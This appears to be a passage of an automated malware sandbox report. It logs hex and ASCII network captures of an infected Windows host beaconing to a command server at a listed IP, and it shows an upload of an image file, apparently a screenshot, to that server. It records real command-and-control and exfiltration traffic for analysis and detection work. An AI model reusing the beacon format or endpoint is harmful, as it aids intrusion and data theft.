                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 23:00:09.564716101 CEST10941OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 23:00:09.565431118 CEST10943OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 23:00:09.565464020 CEST10946OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 23:00:09.565941095 CEST10949OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 23:00:09.567053080 CEST10952OUTData Raw: 71 ff 00 09 d7 8d cf fd c9 13 7f f1 75 fc de 78 6b e1 1f c5 8f 18 fc 4d 1f 05 3c 1f f0 ab c4 9a af 8c cd fc f6 23 c2 3a 66 85 71 3e a8 6e a1 df e7 41 f6 44 43 37 98 9b 1f 72 6d dc bb 1b 20 60 d7 5f a0 7e c4 3f b6 af 8c 3c 6b af 7c 33 f0 97 ec 75
                                                                                                                                          Data Ascii: quxkM<#:fq>nADC7rm `_~?<k|3u[T'~?:?j 2[F@/`1UZ-jCcq:n!}uz7r~o:3>6x?823_:[oAIzm"I4bCE
                                                                                                                                          Apr 28, 2021 23:00:09.567500114 CEST10954OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 23:00:09.569700003 CEST10957OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u
                                                                                                                                          Apr 28, 2021 23:00:09.663209915 CEST10960OUTData Raw: cf e6 5e 9c f1 56 25 d3 a5 85 80 09 9c 74 15 ea 65 b9 46 2b 01 5a ac e7 3b a9 b6 d2 e8 9b 94 a4 ff 00 f4 a5 1d 2d a4 57 5b b7 e5 e3 b3 4c 2e 36 95 38 42 3a c5 5a ef 76 94 63 15 eb f0 f3 36 fe d4 a5 b2 b2 55 e9 b1 f7 a9 9a de 6e a5 29 16 37 cf dc
                                                                                                                                          Data Ascii: ^V%teF+Z;-W[L.68B:Zvc6Un)7[yTZ?Z>\rJTMt}^S.a?H*Ty;rAOXjjXB*~etrs]P7JY#o:`3"U&9/)<9/SRy^h#


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          373192.168.2.449973176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:09.552373886 CEST10930OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          374176.111.174.11480192.168.2.449973C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:09.665091038 CEST10989INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:09 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          375192.168.2.449974176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:09.885467052 CEST11145OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          376176.111.174.11480192.168.2.449972C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:09.965620995 CEST11146INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:09 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          377176.111.174.11480192.168.2.449974C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:09.990391016 CEST11146INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:09 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          378192.168.2.449976176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:10.585930109 CEST11147OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          379176.111.174.11480192.168.2.449976C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:10.689419031 CEST11148INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:10 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          38192.168.2.449767176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:16.671982050 CEST4540OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          380192.168.2.449977176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:10.969852924 CEST11148OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          381176.111.174.11480192.168.2.449977C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:11.069154978 CEST11149INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:11 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          382192.168.2.449979176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:12.207299948 CEST11149OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          383176.111.174.11480192.168.2.449979C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:12.306950092 CEST11150INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:12 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          384192.168.2.449980176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:12.526020050 CEST11150OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          385176.111.174.11480192.168.2.449980C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:12.624404907 CEST11151INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:12 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          386192.168.2.449981176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:12.836747885 CEST11151OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          387176.111.174.11480192.168.2.449981C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:12.940705061 CEST11152INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:12 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          388192.168.2.449982176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:13.146498919 CEST11152OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          389176.111.174.11480192.168.2.449982C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:13.248759985 CEST11153INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:13 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          39176.111.174.11480192.168.2.449767C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:16.775975943 CEST4540INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:16 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          390192.168.2.449983176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:13.458813906 CEST11153OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          391192.168.2.449984176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:13.472501993 CEST11167OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 